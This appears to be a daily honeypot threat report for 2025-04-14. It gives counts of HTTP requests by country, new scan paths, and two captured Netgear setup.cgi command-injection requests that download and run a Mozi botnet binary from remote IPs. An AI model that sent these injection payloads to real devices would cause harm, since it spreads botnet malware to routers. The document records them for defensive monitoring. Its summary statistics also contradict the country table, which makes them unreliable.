Daily Report: 2025-04-14#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).
There are 13 new requests that have never been observed before (these were added to the monitored request database.).
A total of 2322 requests were recorded during the day, originating from 2 different countries, with a peak of 554 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
59.182.104.246 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.182.104.246:35249/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
115.60.215.88 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.60.215.88:43368/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
28 | 5 | GET /F58rYqB/ HTTP/1.1 |
311 | 1 | GET /OdinHttpCall1744661762 HTTP/1.1 |
312 | 1 | GET /Odin/http/call1744661762 HTTP/1.1 |
347 | 1 | GET /odinhttpcall1744661762 HTTP/1.1 |
477 | 1 | GET /7vMb HTTP/1.1 |
483 | 1 | GET /nmaplowercheck1744594891 HTTP/1.1 |
524 | 1 | GET /nmaplowercheck1744594892 HTTP/1.1 |
527 | 1 | GET /NmapUpperCheck1744594891 HTTP/1.1 |
532 | 1 | GET /NmapUpperCheck1744594892 HTTP/1.1 |
533 | 1 | GET /Nmap/folder/check1744594891 HTTP/1.1 |
534 | 1 | GET /Nmap/folder/check1744594892 HTTP/1.1 |
608 | 1 | GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1 |
655 | 1 | GET /media/wp-includes/wlwmanifest.xml HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 554 | GB |
1 | 300 | NL |
2 | 293 | SC |
3 | 279 | US |
4 | 233 | BG |
5 | 140 | DE |
6 | 93 | PL |
7 | 89 | CN |
8 | 49 | IN |
9 | 38 | HK |
10 | 34 | RU |
11 | 34 | CA |
12 | 25 | IL |
13 | 21 | JP |
14 | 19 | FR |
15 | 15 | UA |
16 | 12 | SG |
17 | 11 | RO |
18 | 9 | VN |
19 | 8 | CH |
20 | 6 | ZA |
21 | 6 | KR |
22 | 6 | BE |
23 | 5 | TR |
24 | 5 | SE |
25 | 4 | PT |
26 | 3 | IT |
27 | 3 | NO |
28 | 3 | MC |
29 | 3 | CZ |
30 | 3 | AO |
31 | 2 | TH |
32 | 2 | ID |
33 | 2 | AU |
34 | 2 | FI |
35 | 1 | BR |
36 | 1 | TW |
37 | 1 | AF |
38 | 1 | AM |
39 | 1 | GE |
40 | 1 | BO |
41 | 1 | AE |
42 | 1 | VI |
43 | 1 | BD |
44 | 1 | PA |
45 | 1 | AR |